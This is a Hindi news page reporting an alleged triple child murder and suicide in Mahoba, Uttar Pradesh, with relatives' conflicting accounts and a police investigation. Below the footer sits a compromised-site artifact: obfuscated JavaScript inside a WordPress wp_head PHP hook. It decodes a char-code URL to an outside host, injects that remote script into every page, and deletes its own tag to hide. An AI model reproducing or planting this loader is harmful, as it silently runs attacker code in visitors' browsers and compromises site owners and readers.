Saturday, July 27, 2024
spot_img

दिल दहलाने वाली घटना! धारदार हथियार से तीन बच्चों की हत्या कर फांसी के फंदे पर झूली मां, जिले में फैली सनसनी

लखनऊ। उत्तर प्रदेश के महोबा से एक दिल दहलाने वाली घटना सामने आ रही है। यहां एक मां ने अपने तीन बच्चों की धारदार हथियार से हत्या कर दी। बच्चों की हत्या करने के बाद मां खुद फांसी के फंदे पर झूल गयी। घटना से क्षेत्र में सनसनी फैली हुई है। सूचना पर पुलिस प्रशासन मौके पर पहुंचा और शवों को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया है। उधर घटना को लेकर क्षेत्र में चर्चाओं का बाजार गर्म है। फिलहाल पुलिस मामले की जांच में जुटी हुई है। उधर इस मामले को लेकर महिला के ससुराल और मायके वाले अलग-अलग बात कर रहे हैं। घटना महोबा के कुलपहाड़ के मोहल्ला कठबरिया की बताई जा रही है।
ससुराल के लोग महिला पर बच्चों की हत्या करने का आरोप लगा रहे हैं। उनका कहना है कि महिला मानसिक रूप से बीमार रहती थी। महिला का पति जब खेत पर गया था, तब उसने घटना को अंजाम दिया। ससुराल के लोग मौके पर मौजूद हैं।
जबकि महिला के मायके पक्ष से भाई सूरज का आरोप है कि कई दिनों से उसकी बहन और उसके पति कल्याण सिंह के बीच विवाद चल रहा था। उसका कहना है कि यहां कोई अनहोनी हुई है। वह पूरे मामले में निष्पक्ष जांच की मांग कर रहा है। जानकारी के अनुसार कठबरिया मोहल्ला निवासी कल्याण सिंह यादव की पत्नी सोनम (35) अपने पुत्र विशाल (11) और पुत्री आरती (9) व अंजलि (7) के साथ रहती थी। उसका उसके पति से अक्सर विवाद होता रहता था। दिवाली पर भी किसी बात को लेकर पत्नी सोनम का अपने पति से विवाद हो गया था। बाद में घर वालों के समझाने पर झगड़ा खत्म किया गया था। बताया जा रहा है कि कल्याण सिंह किसी दूसरे गांव में भी कभी-कभी रहने चला जाता था। इस बात से सोनम नाराज रहती थी। शनिवार की सुबह तीनों बच्चों के शव बिस्तर पर पड़े मिले। सोनम का शव संदिग्ध हालात में फांसी पर लटकता मिला। तीनों बच्चों के गले धारदार हथियार से रेते गए थे। सूचना मिलते ही पुलिस मौके पर पहुंची और छानबीन की। मृतका के बड़े भाई भानसिंह ने पुलिस को बताया कि दिवाली से कल्याण अपनी पत्नी और बच्चों से बात नहीं कर रहा था। वो घर में खाना भी नहीं खा रहा था।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>